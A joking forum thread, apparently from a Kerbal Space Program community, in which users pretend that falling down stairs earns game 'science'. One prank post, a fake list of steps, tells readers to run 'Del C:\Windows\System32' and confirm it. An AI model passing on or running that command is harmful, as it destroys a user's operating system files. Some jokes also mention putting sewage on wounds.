Can I get Science from falling down stairs?

Sgt.Shutesie

You could try to calculate the exact gravitational force of the earth and the average drag of your body that would be needed to cause a to result in the velocity that caused the injuries you received.

Well, I kinda just feel down some stairs and scraped my arms up a bit. Can I gather any science from this unplanned experiment?

Sounds like a practical application of Force = Mass * Acceleration

Well, I kinda just feel down some stairs and scraped my arms up a bit. Can I gather any science from this unplanned experiment?

Yes. You should right click yourself so the "EVA Report" button appears. Time your left click so you hit the button when you're tumbling in mid-air, allowing you to collect "EVA Report when in-flight over stairs".

Since both your arms have abrasions, treat one with alcohol solution and the other with untreated sewage mystery goo*. Catalog and compare the state of recouperation twice a day over a two week period. Hope to see a nice graph in 14 days ;)

*please consult your local ethics committee, your gp and anyone but me beforehand

Edited by Yakuzi

Hmm, maybe I could spend my science earned on better SAS modules.

True that, it's only after exploding 50 times when landing that I finally put landing gear on my micro-shuttle that makes regular trips to the Mun.

I call that... experiential development

yes and now you should be able to unlock the "while carrying things" experiment, so you'll need to return to the stairs biome to get more readings.

Why not the "While pulling the heavy filing cabinet behind you" experiment? XD

Seriously though, don't.

Well, I kinda just fell down some stairs and scraped my arms up a bit. Can I gather any science from this unplanned experiment?

A good scientific experiment is repeatable. So go back up those stairs, fall down again and see what you can scrape or break this time. :sticktongue:

I'd get an arduino and SD shield for data logging, then wire up a few accelerometers on your limbs and core... This way you can get a more complete picture of the fall and the forces involved. Just remember that without a transmitter you will have to be able to get the SD card home if you want your science.

Guys are we still taking hard falls and ending up in the hospital?

Why not use some radially attached pillows and collect additional science off them? Might still end up with parts broken but you can recover the pillows for additional science making stairs missions more efficient.

Use it to test the amount of time between ragdoll status coming into effect and when you can first stand up. See if it is related to height, velocity or impact speed.

Experiment with the .cfg to see if you can reduce this time.

What do you mean you can't edit your.cfg?

Mine is right here in settings/reality/main.cfg

Why not use some radially attached pillows and collect additional science off them? Might still end up with parts broken but you can recover the pillows for additional science making stairs missions more efficient.

I also think this is an excellent suggestion. This will enable the experiment to be repeated with less parts breaking, allowing you to recover more of your body.

Many versions ago, I used to attempt to gain extra flight time when jumping from stairs, by attaching a blanket to my arms. I have not tried this lately, so maybe that's something you could try, if you want to get the 'in flight' situation. That's got to be worth some points.

You'll need to perform the experiment again, but make sure you've got the Impact mod installed. If you have any siblings present, have them operate the Flashometer (IE: take pictures). And be sure to run the second part of this experiment - falling up stairs.

Here is how 2 get more science, I lerned because my dad works @ squad

1) copy and paste this message on 10 posts, and send it to 5 of your friends. Then open command prompt, and type "Del C:\Windows\System32" and type Y.

2) restart your computer, and fall down the stairs again. Once you've hit the bottom stair, go to your computer.

3*) Get the code that has appeared on the computers screen

4) Get a job as a customer service representative.

5**) Once you encounter the most unpleasant person you think you'll ever meet, tell them the code, and the customer should give you an adress

6) Go to that adress wearing NOTHING but a banana suit soaked in ketchup and shrimp blood.

7) Draw a hexagram in ketchup on the ground

8) Chant "LLAYA AILAYH ORLAYD RANKAYF, ODAYG FAYO OATAYG NDAYA OATAYG ELATEDAYR RODUCTSAYP!"

9) The mighty Lord frank should appear, and tell you the secrets of the universe, including science.

10) ????????????????????????????

11) PROFIT!

*There is a chance your computer will break from sheer awesome. If this happens, become an EA employee for 5 years, and use the money and ONLY the money that you earned to buy a new computer, then start over from step 1

**If you tell it to someone who isn't the most unpleasant person ever, then you'll get fired from your job and you'll have to start of from step one.

Edited by temporalExile

This thread is quite old. Please consider starting a new thread rather than reviving this one.